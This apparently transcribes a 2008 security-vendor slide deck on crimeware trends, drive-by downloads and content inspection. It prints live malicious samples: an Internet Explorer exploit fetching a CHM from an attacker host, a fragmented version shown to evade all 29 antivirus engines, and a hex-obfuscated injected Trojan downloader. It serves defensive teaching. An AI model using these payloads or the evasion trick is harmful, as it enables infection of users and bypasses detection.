The document discusses trends in crimeware and techniques used to evade detection. It describes how legitimate websites can be compromised to deliver drive-by downloads and how obfuscation is used to circumvent signature-based detection. The document analyzes examples of infected servers harvesting login credentials and personal data from victims. It advocates for proactive inspection of web content to detect unknown threats unlike reactive signature-based approaches.

1. Chicago AITP – November 10, 2008 Devising a Strategy to Mitigate Malware Joann K. Davis (O) 847.304.1892 (C) 847.769.3018 [email_address]

2. This presentation may contain images of websites which have been found to have served web content with embedded crimeware. The depicted reputable websites are NOT part of the crimeware problem described herein. They are in fact targets and victims of the new and sophisticated schemes employed by criminals in the distribution of crimeware that we see emerging today. This presentation uses Finjan as an EXAMPLE of Proactive Web Content Inspection technology and the MCRC as an EXAMPLE of Security Vendor research labs. Disclaimers

5. McAfee : the number of keyloggers increased by 250% between January 2004 and May 2006. Phishing attacks increased by 100% only. Symantec : 4.7 million distinct computers are actively used in botnets to spit out spam, launch DoS (denial of service) attacks, install malware or log keystrokes for identity theft Sophos : Researchers are finding 29,700 new infected Web pages every day, and 80% of them are legitimate sites that have been compromised Microsoft : the Malicious Software Removal Tool (MSRT) has removed at least one Trojan from about 3.5 million unique computers. Of the 5.7 million infected Windows machines, about 62 percent was found with a Trojan or bot FBI : Over One Million victim computers are being actively used for botnets. Growth of Cybercrime Source: AV-Test Labs

8. Evolution of obfuscation

10. Anatomy of a ‘Drop-Site’ Server Review Stolen Information via Web Interface – Command and Control Attack Campaigns target specific groups, regions, and type of data. Logs are grouped by Country. Data is gathered as text and graphic images.

11. Web-Based Command And Control Execute Commands Against Infected User Machines.

14. Harvested Data: Full Screen Capture Actual Screenshots Logged to Crimeware Server

19. Value Depends Upon Who and Where You Are

20. Web Attacker Toolkits Toolkits Bring Hacking to the Masses Monitor the Success of Your Campaigns

21. Example of pay-per-infection

22. Crimeware Where You Least Expect It

23. Malicious Websites by Category Challenges Traditional URL Filtering

25. A Drive-By Attack An Innocent Free Game Website Simply visit this site to get infected. There is no need to click a link, download or install any software (at least that you are aware of).

26. A Drive-By Attack An Innocent Free Game Website Exploits our desktop to install a Trojan

27. A Drive-By Attack Each user session receives a different signature for the same exploit Dynamic Code Obfuscation

36. Berkeley.edu Categorization by URL Filtering Not Categorized as Malicious

37. Example of Malware using Fragmentation Original malicious page found in the wild Exploiting a well-known exploit of Internet Explorer described on: CVE-2004-0380 and MS04-013 Exploit <html><head></head> <body> <script> try{ document.write('<object data=&quot;&#'+109+';s-its:mhtml'+':'+'file://C:nosuch.mht! http://troyanov.net/001/chm/targ.chm ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>

38. Detected by some AV Engines 9 out of 29 Anti-viruses successfully detected the known malicious code ( www.virustotal.com)

39. Basic Code Modification Techniques Original malicious page found in the wild – “modified” Without changing the malicious code exploiting IE, we added a simple Javascript command that just add a dummy string. Will the Anti-Virus detect the malicious code….? Added string Fragmented string <html><head></head> <body <script> try{ document.write(‘dummy string’); document.write('<object data=&quot;&#'+109+';s-its:m' + 'h' + 't' + 'ml'+':'+'fi' + 'le://C:nosuch.m' + + 'ht! http://troyanov.net/001/chm/targ.chm ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>

40. Circumnavigates Signatures and Heuristics 0 out of 29 Anti-viruses detected the known malicious code ( www.virustotal.com)

41. How Does It Work? Finjan Vital Security TM NG <script> Document.write(“ BAD ”); </script> <script> Document.write(“ BA ” + “ D ”); </script> URL Filter Anti- Virus “ BAD ” Internet “ x.com ” Real-time Content Inspection Real-time content inspection technology determines the intent of the script and does not depend upon signatures or reputation of source. Crimeware is embedded in the web page, often unknown to even source servers of high reputation. Malicious code is blocked at the gateway protecting your system from harm. An employee points his browser to “ x.com” . For business productivity reasons, this site may be blocked. An employee points her browser to “ neededforwork.com” . AV software performs a database scan to match signatures of known malicious code. In this case, a match is found. Crimeware, even the still unknown threat, is blocked at the gateway protecting your system from harm. Just seconds later, a request to the same server eludes traditional signature-based detection via dynamic obfuscation techniques. Simple string fragmentation and code obfuscation techniques are used to evade signature-based protection mechanisms. By deconstructing the code to its constituent algorithms, scanner determines the mobile code’s true intent.

42. Life Without Content Inspection Finjan Vital Security TM NG URL Filter Anti- Virus “ BAD ” Internet “ x.com ” Real-time Content Inspection <script> Document.write(“ BA ” + “ D ”); </script> Crimeware has infiltrated your environment. It executes with the same level of authorization as the user who accessed the infected web page. What information is available to that person and now the crimeware? Personnel Information Account Information Intellectual Property Trade Secrets Customer Information Userids/Passwords Financial Reports Customer Lists Payroll Data … Is this Information valuable to you? What could happen without scanning?

43. Multi-Tiered Protection URL/Reputation Anti-Virus Real-time Content Inspection

44. Reactive vs. Proactive Conventional Products Protect Against Known Attacks FW , AV, IPS / IDS, URL Next Generation Real-Time Content Inspection Java applet HTML EXE Java Script VB Script ActiveX Mobile Code Layer

46. Web Security Violation Breakdown – Sample Audit Block Access to Spyware Sites Block Application Level Vulnerabilities Block Malicious Scripts by Behavior Block Malicious ActiveX, Java Applets and Executables Block Binary Exploits in Textual Files Block Known Viruses (Kaspersky) White List No Behavior Based Scanning Block Files with Suspicious Multiple Extensions Block Access to Blacklisted URLs Block Spoofed Content Block Potentially Malicious Archives Block Binary Objects with Invalid Digital Certificate Block Microsoft Office Documents containing Macros and/or Embedded Files Block Access to Adware Sites Block IM Tunneling 14,897 8,344 2,500 967 846 781 500 487 392 303 201 168 104 4 1

47. Example - Malicious Behavior Detected behavior: Obfuscated Script URL: www.xrteam.com Code Sample <body>< script>function xy1q487ded85e3648(q487ded85e3e18){ return (parseInt(q487ded85e3e18,16));}function q487ded85e5588(q487ded85e5d59){ var q487ded85e652f='';q487ded85e846c=String.fromCharCode;for(q487ded85e6cf7=0;q487ded85e6cf7<q487ded85e5d59.length;q487ded85e6cf7+=2){ q487ded85e652f+=(q487ded85e846c(xy1q487ded85e3648(q487ded85e5d59.substr(q487ded85e6cf7,2))));}return q487ded85e652f;} var q487ded85e8c35='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533322533312533302533362533382532392532622532372536332536332536322533372533382536352533372532372532302537372536392536342537342536382533642533342533362532302536382536352536392536372536382537342533642533342533352533382532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q487ded85e5588(q487ded85e8c35));</script> <table width=&quot;790&quot; border=&quot;0&quot; align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;> Impact: Attempts to download a Trojan to the desktop (Trojan-Downloader.JS.Agent.ciw )

48. Malware Example – File Create URL: http://www.nestle.com/js/WebTrends.js?lwt=8CA0EA3034E6FD4 Code Sample n = external.menuArguments; var wsh = new ActiveXObject (&quot;WScript.Shell&quot;); var fso = new ActiveXObject(&quot; Scripting.FileSystemObject &quot;); var tempfolder = fso.GetSpecialFolder(2); var filename = tempfolder.path + &quot;&quot; + fso.GetTempName(); var file Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.

49. Malware Example – File Write URL: http://www.talentplusspotlight.com/admin/htmlarea/editor.js Code Sample heckDocument() { oShell= new ActiveXObject(&quot;WScript.Shell&quot;); oShell.SendKeys( &quot;^c&quot; ); // copy oWord = new ActiveXObject (&quot;Word.Application&quot;); oWord.Documents.Add(); oWord.Selection.Paste(); oWord.ActiveDocument.CheckSpelling(); oWord.Selec Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.

50. Malware Example – File Query URL: http://www.nestle.com/js/WebTrends.js?lwt=8CA0EA3034E6FD4 Code Sample veXObject(&quot;WScript.Shell&quot;); var fso = new ActiveXObject (&quot; Scripting.FileSystemObject &quot;); var tempfolder = fso. GetSpecialFolder (2); var filename = tempfolder.path + &quot;&quot; + fso.GetTempName(); var file = fso.CreateTextFile(filename, true, true); fi Impact: The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.

51. Malware Example – Create Process URL: http://www.talentplusspotlight.com/admin/htmlarea/editor.js Code Sample heckDocument() { oShell= new ActiveXObject(&quot; WScript.Shell &quot;); oShell.SendKeys( &quot;^c&quot; ); // copy oWord = new ActiveXObject(&quot;Word.Application&quot;); oWord.Documents.Add(); oWord.Selection.Paste(); oWord.ActiveDocument.CheckSpelling(); oWord.Selec Impact: The WSript.Shell object provides functions to run a program locally, manipulate the contents of the registry, create a shortcut, access to system folder and environment variables, work with the registry and manage shortcuts. By using this object the end-user machine is compromised.

52. Malware Example – Clipboard Vulnerability Detected behavior: IE Unauthorized Clipboard Contents Disclosure Vulnerability URL: http://www.hrci.org/dzapps/docs/htmlarea/editor.js Code Sample else if (cmdID.toLowerCase() == ' paste ') { editdoc. execCommand ('Paste'); var str=editdoc.body. createTextRange ().htmlText; if (str.indexOf(&quot;; mso-&quot;)>=0 ||str.indexOf(&quot;<v:&quot;)>=0 ||str.indexOf('class=&quot;Mso')>=0){ myclean(editdoc); } editdoc.body.innerHT Impact: This vulnerability could permit scripting operations to gain access to clipboard contents. This issue employs the execCommand('Paste') method to copy clipboard contents into small (or hidden) textarea. In this manner, security checks performed by the browser are bypassed and the clipboard contents will be copied.

54. Example of Potentially Malicious Behavior Detected behavior: IE Shell.Application Object Script Execution Vulnerability URL: http://b.adserv.cn/E/J.JS Code Sample lbEFl0X].substring(1,z1IlbpFl0X[z1IlbEFl0X].length-1));if(z1IlbFFl0X){try{varz1IlcvFl0X=x0r1aW2Z(z1IlbFFl0X,&quot; Shell.Application &quot;);if(z1IlcvFl0X){z1IlctFl0X=z1IlEFl0X(z1IlbFFl0X);returnz1IlctFl0X;}}catch(e){}}z1IlbEFl0X++;}returnfalse;} Malicious Behavior: The Shell object represents the objects in the Windows Shell. This object expose methods which provides abilities to: Open, explore, and browse for folders; Minimize, restore, cascade, or tile open windows; Launch Control Panel applications; Display system dialog boxes. By using this object, the end-user machine is compromised.

56. Web Monitor module The results of the scan (“ok” or “bad”) are returned to the Web Monitor module where next step processing may include notifying Administrators via Email of the discovery of malicious content on your website. Finjan Vital Security TM NG plus Anti-Virus A Web Monitor Module is configured to automatically scan web pages served by your company. If these pages are found to have been compromised by malicious content, an alert will be sent. Note: the Web Monitor module is custom code . The Web Monitor Module issues an HTTP GET request for every URL your company serves or only those you wish to scan. Besides being able to monitor the uptime and response time of your web servers, it will scan for crimeware. Using a combination of Anti-Virus and real-time content inspection technologies, the page is scanned for malicious content… Monitoring Your Web Servers

59. Example of Vendor Resources

60. Example of Vendor Blog

67. Questions???